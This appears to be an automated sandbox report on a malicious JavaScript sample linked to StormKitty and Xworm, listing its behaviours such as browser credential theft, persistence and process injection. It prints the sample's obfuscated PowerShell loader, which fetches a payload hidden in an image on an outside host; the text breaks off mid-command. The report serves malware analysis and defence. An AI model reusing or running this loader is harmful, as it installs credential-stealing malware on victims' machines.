Analysis Overview
SHA256
c6b076cf47cd1b57a71acfb1e5d257c657403af0ae983f4084a4057e18e81168
Threat Level: Known bad
The file c6b076cf47cd1b57a71acfb1e5d257c657403af0ae983f4084a4057e18e81168.js was found to be: Known bad.
Malicious Activity Summary
StormKitty
Detect Xworm Payload
Xworm
StormKitty payload
Credentials from Password Stores: Credentials from Web Browsers
Blocklisted process makes network request
Command and Scripting Interpreter: PowerShell
Checks computer location settings
Adds Run key to start application
Suspicious use of SetThreadContext
System Location Discovery: System Language Discovery
Command and Scripting Interpreter: JavaScript
Browser Information Discovery
Enumerates physical storage devices
Suspicious use of WriteProcessMemory
Suspicious behavior: EnumeratesProcesses
Suspicious use of SetWindowsHookEx
Suspicious behavior: AddClipboardFormatListener
Suspicious use of AdjustPrivilegeToken
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-08-09 19:41
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-08-09 19:41
Reported
2024-08-09 19:43
Platform
win7-20240708-en
Max time kernel
119s
Max time network
120s
Command Line
Signatures
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: JavaScript
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2968 wrote to memory of 2204 | N/A | C:\Windows\system32\wscript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 2968 wrote to memory of 2204 | N/A | C:\Windows\system32\wscript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 2968 wrote to memory of 2204 | N/A | C:\Windows\system32\wscript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 2204 wrote to memory of 2328 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 2204 wrote to memory of 2328 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 2204 wrote to memory of 2328 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Processes
C:\Windows\system32\wscript.exe
wscript.exe C:\Users\Admin\AppData\Local\Temp\c6b076cf47cd1b57a71acfb1e5d257c657403af0ae983f4084a4057e18e81168.js
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J㏵ ⊷ ➟ ⇒ ▷Bp㏵ ⊷ ➟ ⇒ ▷G0㏵ ⊷ ➟ ⇒ ▷YQBn㏵ ⊷ ➟ ⇒ ▷GU㏵ ⊷ ➟ ⇒ ▷VQBy㏵ ⊷ ➟ ⇒ ▷Gw㏵ ⊷ ➟ ⇒ ▷I㏵ ⊷ ➟ ⇒ ▷㏵ ⊷ ➟ ⇒ ▷9㏵ ⊷ ➟ ⇒ ▷C㏵ ⊷ ➟ ⇒ ▷㏵ ⊷ ➟ ⇒ ▷JwBo㏵ ⊷ ➟ ⇒ ▷HQ㏵ ⊷ ➟ ⇒ ▷d㏵ ⊷ ➟ ⇒ ▷Bw㏵ ⊷ ➟ ⇒ ▷HM㏵ ⊷ ➟ ⇒ ▷Og㏵ ⊷ ➟ ⇒ ▷v㏵ ⊷ ➟ ⇒ ▷C8㏵ ⊷ ➟ ⇒ ▷aQBh㏵ ⊷ ➟ ⇒ ▷DY㏵ ⊷ ➟ ⇒ ▷M㏵ ⊷ ➟ ⇒ ▷㏵ ⊷ ➟ ⇒ ▷x㏵ ⊷ ➟ ⇒ ▷DY㏵ ⊷ ➟ ⇒ ▷M㏵ ⊷ ➟ ⇒ ▷㏵ ⊷ ➟ ⇒ ▷2㏵ ⊷ ➟ ⇒ ▷C4㏵ ⊷ ➟ ⇒ ▷dQBz㏵ ⊷ ➟ ⇒ ▷C4㏵ ⊷ ➟ ⇒ ▷YQBy㏵ ⊷ ➟ ⇒ ▷GM㏵ ⊷ ➟ ⇒ ▷a㏵ ⊷ ➟ ⇒ ▷Bp㏵ ⊷ ➟ ⇒ ▷HY㏵ ⊷ ➟ ⇒ ▷ZQ㏵ ⊷ ➟ ⇒ ▷u㏵ ⊷ ➟ ⇒ ▷G8㏵ ⊷ ➟ ⇒ ▷cgBn㏵ ⊷ ➟ ⇒ ▷C8㏵ ⊷ ➟ ⇒ ▷MQ㏵ ⊷ ➟ ⇒ ▷w㏵ ⊷ ➟ ⇒ ▷C8㏵ ⊷ ➟ ⇒ ▷aQB0㏵ ⊷ ➟ ⇒ ▷GU㏵ ⊷ ➟ ⇒ ▷bQBz㏵ ⊷ ➟ ⇒ ▷C8㏵ ⊷ ➟ ⇒ ▷Z㏵ ⊷ ➟ ⇒ ▷Bl㏵ ⊷ ➟ ⇒ ▷GE㏵ ⊷ ➟ ⇒ ▷d㏵ ⊷ ➟ ⇒ ▷Bo㏵ ⊷ ➟ ⇒ ▷G4㏵ ⊷ ➟ ⇒ ▷bwB0㏵ ⊷ ➟ ⇒ ▷GU㏵ ⊷ ➟ ⇒ ▷Xw㏵ ⊷ ➟ ⇒ ▷y㏵ ⊷ ➟ ⇒ ▷D㏵ ⊷ ➟ ⇒ ▷㏵ ⊷ ➟ ⇒ ▷Mg㏵ ⊷ ➟ ⇒ ▷0㏵ ⊷ ➟ ⇒ ▷D㏵ ⊷ ➟ ⇒ ▷㏵ ⊷ ➟ ⇒ ▷Nw㏵ ⊷ ➟ ⇒ ▷v㏵ ⊷ ➟ ⇒ ▷GQ㏵ ⊷ ➟ ⇒ ▷ZQBh㏵ ⊷ ➟ ⇒ ▷HQ㏵ ⊷ ➟ ⇒ ▷a㏵ ⊷ ➟ ⇒ ▷Bu㏵ ⊷ ➟ ⇒ ▷G8㏵ ⊷ ➟ ⇒ ▷d㏵ ⊷ ➟ ⇒ ▷Bl㏵ ⊷ ➟ ⇒ ▷C4㏵ ⊷ ➟ ⇒ ▷agBw㏵ ⊷ ➟ ⇒ ▷Gc㏵ ⊷ ➟ ⇒ ▷Jw㏵ ⊷ ➟ ⇒ ▷7㏵ ⊷ ➟ ⇒ ▷CQ㏵ ⊷ ➟ ⇒ ▷dwBl㏵ ⊷ ➟ ⇒ ▷GI㏵ ⊷ ➟ ⇒ ▷QwBs㏵ ⊷ ➟ ⇒ ▷Gk㏵ ⊷ ➟ ⇒ ▷ZQBu㏵ ⊷ ➟ ⇒ ▷HQ㏵ ⊷ ➟ ⇒ ▷I㏵ ⊷ ➟ ⇒ ▷㏵ ⊷ ➟ ⇒ ▷9㏵ ⊷ ➟ ⇒ ▷C㏵ ⊷ ➟ ⇒ ▷㏵ ⊷ ➟ ⇒ ▷TgBl㏵ ⊷ ➟ ⇒ ▷Hc㏵ ⊷ ➟ ⇒ ▷LQBP㏵ ⊷ ➟ ⇒ ▷GI㏵ ⊷ ➟ ⇒ ▷agBl㏵ ⊷ ➟ ⇒ ▷GM㏵ ⊷ ➟ ⇒ ▷d㏵ ⊷ ➟ ⇒ ▷㏵ ⊷ ➟ ⇒ ▷g㏵ ⊷ ➟ ⇒ ▷FM㏵ ⊷ ➟ ⇒ ▷eQBz㏵ ⊷ ➟ ⇒ ▷HQ㏵ ⊷ ➟ ⇒ ▷ZQBt㏵ ⊷ ➟ ⇒ ▷C4㏵ ⊷ ➟ ⇒ ▷TgBl㏵ ⊷ ➟ ⇒ ▷HQ㏵ ⊷ ➟ ⇒ ▷LgBX㏵ ⊷ ➟ ⇒ ▷GU㏵ ⊷ ➟ ⇒ ▷YgBD㏵ ⊷ ➟ ⇒ ▷Gw㏵ ⊷ ➟ ⇒ ▷aQBl㏵ ⊷ ➟ ⇒ ▷G4㏵ ⊷ ➟ ⇒ ▷d㏵ ⊷ ➟ ⇒ ▷㏵ ⊷ ➟ ⇒ ▷7㏵ ⊷ ➟ ⇒ ▷CQ㏵ ⊷ ➟ ⇒ ▷aQBt㏵ ⊷ ➟ ⇒ ▷GE㏵ ⊷ ➟ ⇒ ▷ZwBl㏵ ⊷ ➟ ⇒ ▷EI㏵ ⊷ ➟ ⇒ ▷eQB0㏵ ⊷ ➟ ⇒ ▷GU㏵ ⊷ ➟ ⇒ ▷cw㏵ ⊷ ➟ ⇒ ▷g㏵ ⊷ ➟ ⇒ ▷D0㏵ ⊷ ➟ ⇒ ▷I㏵ ⊷ ➟ ⇒ ▷㏵ ⊷ ➟ ⇒ ▷k㏵ ⊷ ➟ ⇒ ▷Hc㏵ ⊷ ➟ ⇒ ▷ZQBi㏵ ⊷ ➟ ⇒ ▷EM㏵ ⊷ ➟ ⇒ ▷b㏵ ⊷ ➟ ⇒ ▷Bp㏵ ⊷ ➟ ⇒ ▷GU㏵ ⊷ ➟ ⇒ ▷bgB0㏵ ⊷ ➟ ⇒ ▷C4㏵ ⊷ ➟ ⇒ ▷R㏵ ⊷ ➟ ⇒ ▷Bv㏵ ⊷ ➟ ⇒ ▷Hc㏵ ⊷ ➟ ⇒ ▷bgBs㏵ ⊷ ➟ ⇒ ▷G8㏵ ⊷ ➟ ⇒ ▷YQBk㏵ ⊷ ➟ ⇒ ▷EQ㏵ ⊷ ➟ ⇒ ▷YQB0㏵ ⊷ ➟ ⇒ ▷GE㏵ ⊷ ➟ ⇒ ▷K㏵ ⊷ ➟ ⇒ ▷㏵ ⊷ ➟ ⇒ ▷k㏵ ⊷ ➟ ⇒ ▷Gk㏵ ⊷ ➟ ⇒ ▷bQBh㏵ ⊷ ➟ ⇒ ▷Gc㏵ ⊷ ➟ ⇒ ▷ZQBV㏵ ⊷ ➟ ⇒ ▷HI㏵ ⊷ ➟ ⇒ ▷b㏵ ⊷ ➟ ⇒ ▷㏵ ⊷ ➟ ⇒ ▷p㏵ ⊷ ➟ ⇒ ▷Ds㏵ ⊷ ➟ ⇒ ▷J㏵ ⊷ ➟ ⇒ ▷Bp㏵ ⊷ ➟ ⇒ ▷G0㏵ ⊷ ➟ ⇒ ▷YQBn㏵ ⊷ ➟ ⇒ ▷GU㏵ ⊷ ➟ ⇒ ▷V㏵ ⊷ ➟ ⇒ ▷Bl㏵ ⊷ ➟ ⇒ ▷Hg㏵ ⊷ ➟ ⇒ ▷d㏵ ⊷ ➟ ⇒ ▷㏵ ⊷ ➟ ⇒ ▷g㏵ ⊷ ➟ ⇒ ▷D0㏵ ⊷ ➟ ⇒ ▷I㏵ ⊷ ➟ ⇒ ▷Bb㏵ ⊷ ➟ ⇒ ▷FM㏵ ⊷ ➟ ⇒ ▷eQBz㏵ ⊷ ➟ ⇒ ▷HQ㏵ ⊷ ➟ ⇒ ▷ZQBt㏵ ⊷ ➟ ⇒ ▷C4㏵ ⊷ ➟ ⇒ ▷V㏵ ⊷ ➟ ⇒ ▷Bl㏵ ⊷ ➟ ⇒ ▷Hg㏵ ⊷ ➟ ⇒ ▷d㏵ ⊷ ➟ ⇒ ▷㏵ ⊷ ➟ ⇒ ▷u㏵ ⊷ ➟ ⇒ ▷EU㏵ ⊷ ➟ ⇒ ▷bgBj㏵ ⊷ ➟ ⇒ ▷G8㏵ ⊷ ➟ ⇒ ▷Z㏵ ⊷ ➟ ⇒ ▷Bp㏵ ⊷ ➟ ⇒ ▷G4㏵ ⊷ ➟ ⇒ ▷ZwBd㏵ ⊷ ➟ ⇒ ▷Do㏵ ⊷ ➟ ⇒ ▷OgBV㏵ ⊷ ➟ ⇒ ▷FQ㏵ ⊷ ➟ ⇒ ▷Rg㏵ ⊷ ➟ ⇒ ▷4㏵ ⊷ ➟ ⇒ ▷C4㏵ ⊷ ➟ ⇒ ▷RwBl㏵ ⊷ ➟ ⇒ ▷HQ㏵ ⊷ ➟ ⇒ ▷UwB0㏵ ⊷ ➟ ⇒ ▷HI㏵ ⊷ ➟ ⇒ ▷aQBu㏵ ⊷ ➟ ⇒ ▷Gc㏵ ⊷ ➟ ⇒ ▷K㏵ ⊷ ➟ ⇒ ▷㏵ ⊷ ➟ ⇒ ▷k㏵ ⊷ ➟ ⇒ ▷Gk㏵ ⊷ ➟ ⇒ ▷bQBh㏵ ⊷ ➟ ⇒ ▷Gc㏵ ⊷ ➟ ⇒ ▷ZQBC㏵ ⊷ ➟ ⇒ ▷Hk㏵ ⊷ ➟ ⇒ ▷d㏵ ⊷ ➟ ⇒ ▷Bl㏵ ⊷ ➟ ⇒ ▷HM㏵ ⊷ ➟ ⇒ ▷KQ㏵ ⊷ ➟ ⇒ ▷7㏵ ⊷ ➟ ⇒ ▷CQ㏵ ⊷ ➟ ⇒ ▷cwB0㏵ ⊷ ➟ ⇒ ▷GE㏵ ⊷ ➟ ⇒ ▷cgB0㏵ ⊷ ➟ ⇒ ▷EY㏵ ⊷ ➟ ⇒ ▷b㏵ ⊷ ➟ ⇒ ▷Bh㏵ ⊷ ➟ ⇒ ▷Gc㏵ ⊷ ➟ ⇒ ▷I㏵ ⊷ ➟ ⇒ ▷㏵ ⊷ ➟ ⇒ ▷9㏵ ⊷ ➟ ⇒ ▷C㏵ ⊷ ➟ ⇒ ▷㏵ ⊷ ➟ ⇒ ▷Jw㏵ ⊷ ➟ ⇒ ▷8㏵ ⊷ ➟ ⇒ ▷Dw㏵ ⊷ ➟ ⇒ ▷QgBB㏵ ⊷ ➟ ⇒ ▷FM㏵ ⊷ ➟ ⇒ ▷RQ㏵ ⊷ ➟ ⇒ ▷2㏵ ⊷ ➟ ⇒ ▷DQ㏵ ⊷ ➟ ⇒ ▷XwBT㏵ ⊷ ➟ ⇒ ▷FQ㏵ ⊷ ➟ ⇒ ▷QQBS㏵ ⊷ ➟ ⇒ ▷FQ㏵ ⊷ ➟ ⇒ ▷Pg㏵ ⊷ ➟ ⇒ ▷+㏵ ⊷ ➟ ⇒ ▷Cc㏵ ⊷ ➟ ⇒ ▷Ow㏵ ⊷ ➟ ⇒ ▷k㏵ ⊷ ➟ ⇒ ▷GU㏵ ⊷ ➟ ⇒ ▷bgBk㏵ ⊷ ➟ ⇒ ▷EY㏵ ⊷ ➟ ⇒ ▷b㏵ ⊷ ➟ ⇒ ▷Bh㏵ ⊷ ➟ ⇒ ▷Gc㏵ ⊷ ➟ ⇒ ▷I㏵ ⊷ ➟ ⇒ ▷㏵ ⊷ ➟ ⇒ ▷9㏵ ⊷ ➟ ⇒ ▷C㏵ ⊷ ➟ ⇒ ▷㏵ ⊷ ➟ ⇒ ▷Jw㏵ ⊷ ➟ ⇒ ▷8㏵ ⊷ ➟ ⇒ ▷Dw㏵ ⊷ ➟ ⇒ ▷QgBB㏵ ⊷ ➟ ⇒ ▷FM㏵ ⊷ ➟ ⇒ ▷RQ㏵ ⊷ ➟ ⇒ ▷2㏵ ⊷ ➟ ⇒ ▷DQ㏵ ⊷ ➟ ⇒ ▷XwBF㏵ ⊷ ➟ ⇒ ▷E4㏵ ⊷ ➟ ⇒ ▷R㏵ ⊷ ➟ ⇒ ▷㏵ ⊷ ➟ ⇒ ▷+㏵ ⊷ ➟ ⇒ ▷D4㏵ ⊷ ➟ ⇒ ▷Jw㏵ ⊷ ➟ ⇒ ▷7㏵ ⊷ ➟ ⇒ ▷CQ㏵ ⊷ ➟ ⇒ ▷cwB0㏵ ⊷ ➟ ⇒ ▷GE㏵ ⊷ ➟ ⇒ ▷cgB0㏵ ⊷ ➟ ⇒ ▷Ek㏵ ⊷ ➟ ⇒ ▷bgBk㏵ ⊷ ➟ ⇒ ▷GU㏵ ⊷ ➟ ⇒ ▷e㏵ ⊷ ➟ ⇒ ▷㏵ ⊷ ➟ ⇒ ▷g㏵ ⊷ ➟ ⇒ ▷D0㏵ ⊷ ➟ ⇒ ▷I㏵ ⊷ ➟ ⇒ ▷㏵ ⊷ ➟ ⇒ ▷k㏵ ⊷ ➟ ⇒ ▷Gk㏵ ⊷ ➟ ⇒ ▷bQBh㏵ ⊷ ➟ ⇒ ▷Gc㏵ ⊷ ➟ ⇒ ▷ZQBU㏵ ⊷ ➟ ⇒ ▷GU㏵ ⊷ ➟ ⇒ ▷e㏵ ⊷ ➟ ⇒ ▷B0㏵ ⊷ ➟ ⇒ ▷C4㏵ ⊷ ➟ ⇒ ▷SQBu㏵ ⊷ ➟ ⇒ ▷GQ㏵ ⊷ ➟ ⇒ ▷ZQB4㏵ ⊷ ➟ ⇒ ▷E8㏵ ⊷ ➟ ⇒ ▷Zg㏵ ⊷ ➟ ⇒ ▷o㏵ ⊷ ➟ ⇒ ▷CQ㏵ ⊷ ➟ ⇒ ▷cwB0㏵ ⊷ ➟ ⇒ ▷GE㏵ ⊷ ➟ ⇒ ▷cgB0㏵ ⊷ ➟ ⇒ ▷EY㏵ ⊷ ➟ ⇒ ▷b㏵ ⊷ ➟ ⇒ ▷Bh㏵ ⊷ ➟ ⇒ ▷Gc㏵ ⊷ ➟ ⇒ ▷KQ㏵ ⊷ ➟ ⇒ ▷7㏵ ⊷ ➟ ⇒ ▷CQ㏵ ⊷ ➟ ⇒ ▷ZQBu㏵ ⊷ ➟ ⇒ ▷GQ㏵ ⊷ ➟ ⇒ ▷SQBu㏵ ⊷ ➟ ⇒ ▷GQ㏵ ⊷ ➟ ⇒ ▷ZQB4㏵ ⊷ ➟ ⇒ ▷C㏵ ⊷ ➟ ⇒ ▷㏵ ⊷ ➟ ⇒ ▷PQ㏵ ⊷ ➟ ⇒ ▷g㏵ ⊷ ➟ ⇒ ▷CQ㏵ ⊷ ➟ ⇒ ▷aQBt㏵ ⊷ ➟ ⇒ ▷GE㏵ ⊷ ➟ ⇒ ▷ZwBl㏵ ⊷ ➟ ⇒ ▷FQ㏵ ⊷ ➟ ⇒ ▷ZQB4㏵ ⊷ ➟ ⇒ ▷HQ㏵ ⊷ ➟ ⇒ ▷LgBJ㏵ ⊷ ➟ ⇒ ▷G4㏵ ⊷ ➟ ⇒ ▷Z㏵ ⊷ ➟ ⇒ ▷Bl㏵ ⊷ ➟ ⇒ ▷Hg㏵ ⊷ ➟ ⇒ ▷TwBm㏵ ⊷ ➟ ⇒ ▷Cg㏵ ⊷ ➟ ⇒ ▷J㏵ ⊷ ➟ ⇒ ▷Bl㏵ ⊷ ➟ ⇒ ▷G4㏵ ⊷ ➟ ⇒ ▷Z㏵ ⊷ ➟ ⇒ ▷BG㏵ ⊷ ➟ ⇒ ▷Gw㏵ ⊷ ➟ ⇒ ▷YQBn㏵ ⊷ ➟ ⇒ ▷Ck㏵ ⊷ ➟ ⇒ ▷Ow㏵ ⊷ ➟ ⇒ ▷k㏵ ⊷ ➟ ⇒ ▷HM㏵ ⊷ ➟ ⇒ ▷d㏵ ⊷ ➟ ⇒ ▷Bh㏵ ⊷ ➟ ⇒ ▷HI㏵ ⊷ ➟ ⇒ ▷d㏵ ⊷ ➟ ⇒ ▷BJ㏵ ⊷ ➟ ⇒ ▷G4㏵ ⊷ ➟ ⇒ ▷Z㏵ ⊷ ➟ ⇒ ▷Bl㏵ ⊷ ➟ ⇒ ▷Hg㏵ ⊷ ➟ ⇒ ▷I㏵ ⊷ ➟ ⇒ ▷㏵ ⊷ ➟ ⇒ ▷t㏵ ⊷ ➟ ⇒ ▷Gc㏵ ⊷ ➟ ⇒ ▷ZQ㏵ ⊷ ➟ ⇒ ▷g㏵ ⊷ ➟ ⇒ ▷D㏵ ⊷ ➟ ⇒ ▷㏵ ⊷ ➟ ⇒ ▷I㏵ ⊷ ➟ ⇒ ▷㏵ ⊷ ➟ ⇒ ▷t㏵ ⊷ ➟ ⇒ ▷GE㏵ ⊷ ➟ ⇒ ▷bgBk㏵ ⊷ ➟ ⇒ ▷C㏵ ⊷ ➟ ⇒ ▷㏵ ⊷ ➟ ⇒ ▷J㏵ ⊷ ➟ ⇒ ▷Bl㏵ ⊷ ➟ ⇒ ▷G4㏵ ⊷ ➟ ⇒ ▷Z㏵ ⊷ ➟ ⇒ ▷BJ㏵ ⊷ ➟ ⇒ ▷G4㏵ ⊷ ➟ ⇒ ▷Z㏵ ⊷ ➟ ⇒ ▷Bl㏵ ⊷ ➟ ⇒ ▷Hg㏵ ⊷ ➟ ⇒ ▷I㏵ ⊷ ➟ ⇒ ▷㏵ ⊷ ➟ ⇒ ▷t㏵ ⊷ ➟ ⇒ ▷Gc㏵ ⊷ ➟ ⇒ ▷d㏵ ⊷ ➟ ⇒ ▷㏵ ⊷ ➟ ⇒ ▷g㏵ ⊷ ➟ ⇒ ▷CQ㏵ ⊷ ➟ ⇒ ▷cwB0㏵ ⊷ ➟ ⇒ ▷GE㏵ ⊷ ➟ ⇒ ▷cgB0㏵ ⊷ ➟ ⇒ ▷Ek㏵ ⊷ ➟ ⇒ ▷bgBk㏵ ⊷ ➟ ⇒ ▷GU㏵ ⊷ ➟ ⇒ ▷e㏵ ⊷ ➟ ⇒ ▷㏵ ⊷ ➟ ⇒ ▷7㏵ ⊷ ➟ ⇒ ▷CQ㏵ ⊷ ➟ ⇒ ▷cwB0㏵ ⊷ ➟ ⇒ ▷GE㏵ ⊷ ➟ ⇒ ▷cgB0㏵ ⊷ ➟ ⇒ ▷Ek㏵ ⊷ ➟ ⇒ ▷bgBk㏵ ⊷ ➟ ⇒ ▷GU㏵ ⊷ ➟ ⇒ ▷e㏵ ⊷ ➟ ⇒ ▷㏵ ⊷ ➟ ⇒ ▷g㏵ ⊷ ➟ ⇒ ▷Cs㏵ ⊷ ➟ ⇒ ▷PQ㏵ ⊷ ➟ ⇒ ▷g㏵ ⊷ ➟ ⇒ ▷CQ㏵ ⊷ ➟ ⇒ ▷cwB0㏵ ⊷ ➟ ⇒ ▷GE㏵ ⊷ ➟ ⇒ ▷cgB0㏵ ⊷ ➟ ⇒ ▷EY㏵ ⊷ ➟ ⇒ ▷b㏵ ⊷ ➟ ⇒ ▷Bh㏵ ⊷ ➟ ⇒ ▷Gc㏵ ⊷ ➟ ⇒ ▷LgBM㏵ ⊷ ➟ ⇒ ▷GU㏵ ⊷ ➟ ⇒ ▷bgBn㏵ ⊷ ➟ ⇒ ▷HQ㏵ ⊷ ➟ ⇒ ▷a㏵ ⊷ ➟ ⇒ ▷㏵ ⊷ ➟ ⇒ ▷7㏵ ⊷ ➟ ⇒ ▷CQ㏵ ⊷ ➟ ⇒ ▷YgBh㏵ ⊷ ➟ ⇒ ▷HM㏵ ⊷ ➟ ⇒ ▷ZQ㏵ ⊷ ➟ ⇒ ▷2㏵ ⊷ ➟ ⇒ ▷DQ㏵ ⊷ ➟ ⇒ ▷T㏵ ⊷ ➟ ⇒ ▷Bl㏵ ⊷ ➟ ⇒ ▷G4㏵ ⊷ ➟ ⇒ ▷ZwB0㏵ ⊷ ➟ ⇒ ▷Gg㏵ ⊷ ➟ ⇒ ▷I㏵ ⊷ ➟ ⇒ ▷㏵ ⊷ ➟ ⇒ ▷9㏵ ⊷ ➟ ⇒ ▷C㏵ ⊷ ➟ ⇒ ▷㏵ ⊷ ➟ ⇒ ▷J㏵ ⊷ ➟ ⇒ ▷Bl㏵ ⊷ ➟ ⇒ ▷G4㏵ ⊷ ➟ ⇒ ▷Z㏵ ⊷ ➟ ⇒ ▷BJ㏵ ⊷ ➟ ⇒ ▷G4㏵ ⊷ ➟ ⇒ ▷Z㏵ ⊷ ➟ ⇒ ▷Bl㏵ ⊷ ➟ ⇒ ▷Hg㏵ ⊷ ➟ ⇒ ▷I㏵ ⊷ ➟ ⇒ ▷㏵ ⊷ ➟ ⇒ ▷t㏵ ⊷ ➟ ⇒ ▷C㏵ ⊷ ➟ ⇒ ▷㏵ ⊷ ➟ ⇒ ▷J㏵ ⊷ ➟ ⇒ ▷Bz㏵ ⊷ ➟ ⇒ ▷HQ㏵ ⊷ ➟ ⇒ ▷YQBy㏵ ⊷ ➟ ⇒ ▷HQ㏵ ⊷ ➟ ⇒ ▷SQBu㏵ ⊷ ➟ ⇒ ▷GQ㏵ ⊷ ➟ ⇒ ▷ZQB4㏵ ⊷ ➟ ⇒ ▷Ds㏵ ⊷ ➟ ⇒ ▷J㏵ ⊷ ➟ ⇒ ▷Bi㏵ ⊷ ➟ ⇒ ▷GE㏵ ⊷ ➟ ⇒ ▷cwBl㏵ ⊷ ➟ ⇒ ▷DY㏵ ⊷ ➟ ⇒ ▷N㏵ ⊷ ➟ ⇒ ▷BD㏵ ⊷ ➟ ⇒ ▷G8㏵ ⊷ ➟ ⇒ ▷bQBt㏵ ⊷ ➟ ⇒ ▷GE㏵ ⊷ ➟ ⇒ ▷bgBk㏵ ⊷ ➟ ⇒ ▷C㏵ ⊷ ➟ ⇒ ▷㏵ ⊷ ➟ ⇒ ▷PQ㏵ ⊷ ➟ ⇒ ▷g㏵ ⊷ ➟ ⇒ ▷CQ㏵ ⊷ ➟ ⇒ ▷aQBt㏵ ⊷ ➟ ⇒ ▷GE㏵ ⊷ ➟ ⇒ ▷ZwBl㏵ ⊷ ➟ ⇒ ▷FQ㏵ ⊷ ➟ ⇒ ▷ZQB4㏵ ⊷ ➟ ⇒ ▷HQ㏵ ⊷ ➟ ⇒ ▷LgBT㏵ ⊷ ➟ ⇒ ▷HU㏵ ⊷ ➟ ⇒ ▷YgBz㏵ ⊷ ➟ ⇒ ▷HQ㏵ ⊷ ➟ ⇒ ▷cgBp㏵ ⊷ ➟ ⇒ ▷G4㏵ ⊷ ➟ ⇒ ▷Zw㏵ ⊷ ➟ ⇒ ▷o㏵ ⊷ ➟ ⇒ ▷CQ㏵ ⊷ ➟ ⇒ ▷cwB0㏵ ⊷ ➟ ⇒ ▷GE㏵ ⊷ ➟ ⇒ ▷cgB0㏵ ⊷ ➟ ⇒ ▷Ek㏵ ⊷ ➟ ⇒ ▷bgBk㏵ ⊷ ➟ ⇒ ▷GU㏵ ⊷ ➟ ⇒ ▷e㏵ ⊷ ➟ ⇒ ▷㏵ ⊷ ➟ ⇒ ▷s㏵ ⊷ ➟ ⇒ ▷C㏵ ⊷ ➟ ⇒ ▷㏵ ⊷ ➟ ⇒ ▷J㏵ ⊷ ➟ ⇒ ▷Bi㏵ ⊷ ➟ ⇒ ▷GE㏵ ⊷ ➟ ⇒ ▷cwBl㏵ ⊷ ➟ ⇒ ▷DY㏵ ⊷ ➟ ⇒ ▷N㏵ ⊷ ➟ ⇒ ▷BM㏵ ⊷ ➟ ⇒ ▷GU㏵ ⊷ ➟ ⇒ ▷bgBn㏵ ⊷ ➟ ⇒ ▷HQ㏵ ⊷ ➟ ⇒ ▷a㏵ ⊷ ➟ ⇒ ▷㏵ ⊷ ➟ ⇒ ▷p㏵ ⊷ ➟ ⇒ ▷Ds㏵ ⊷ ➟ ⇒ ▷J㏵ ⊷ ➟ ⇒ ▷Bj㏵ ⊷ ➟ ⇒ ▷G8㏵ ⊷ ➟ ⇒ ▷bQBt㏵ ⊷ ➟ ⇒ ▷GE㏵ ⊷ ➟ ⇒ ▷bgBk㏵ ⊷ ➟ ⇒ ▷EI㏵ ⊷ ➟ ⇒ ▷eQB0㏵ ⊷ ➟ ⇒ ▷GU㏵ ⊷ ➟ ⇒ ▷cw㏵ ⊷ ➟ ⇒ ▷g㏵ ⊷ ➟ ⇒ ▷D0㏵ ⊷ ➟ ⇒ ▷I㏵ ⊷ ➟ ⇒ ▷Bb㏵ ⊷ ➟ ⇒ ▷FM㏵ ⊷ ➟ ⇒ ▷eQBz㏵ ⊷ ➟ ⇒ ▷HQ㏵ ⊷ ➟ ⇒ ▷ZQBt㏵ ⊷ ➟ ⇒ ▷C4㏵ ⊷ ➟ ⇒ ▷QwBv㏵ ⊷ ➟ ⇒ ▷G4㏵ ⊷ ➟ ⇒ ▷dgBl㏵ ⊷ ➟ ⇒ ▷HI㏵ ⊷ ➟ ⇒ ▷d㏵ ⊷ ➟ ⇒ ▷Bd㏵ ⊷ ➟ ⇒ ▷Do㏵ ⊷ ➟ ⇒ ▷OgBG㏵ ⊷ ➟ ⇒ ▷HI㏵ ⊷ ➟ ⇒ ▷bwBt㏵ ⊷ ➟ ⇒ ▷EI㏵ ⊷ ➟ ⇒ ▷YQBz㏵ ⊷ ➟ ⇒ ▷GU㏵ ⊷ ➟ ⇒ ▷Ng㏵ ⊷ ➟ ⇒ ▷0㏵ ⊷ ➟ ⇒ ▷FM㏵ ⊷ ➟ ⇒ ▷d㏵ ⊷ ➟ ⇒ ▷By㏵ ⊷ ➟ ⇒ ▷Gk㏵ ⊷ ➟ ⇒ ▷bgBn㏵ ⊷ ➟ ⇒ ▷Cg㏵ ⊷ ➟ ⇒ ▷J㏵ ⊷ ➟ ⇒ ▷Bi㏵ ⊷ ➟ ⇒ ▷GE㏵ ⊷ ➟ ⇒ ▷cwBl㏵ ⊷ ➟ ⇒ ▷DY㏵ ⊷ ➟ ⇒ ▷N㏵ ⊷ ➟ ⇒ ▷BD㏵ ⊷ ➟ ⇒ ▷G8㏵ ⊷ ➟ ⇒ 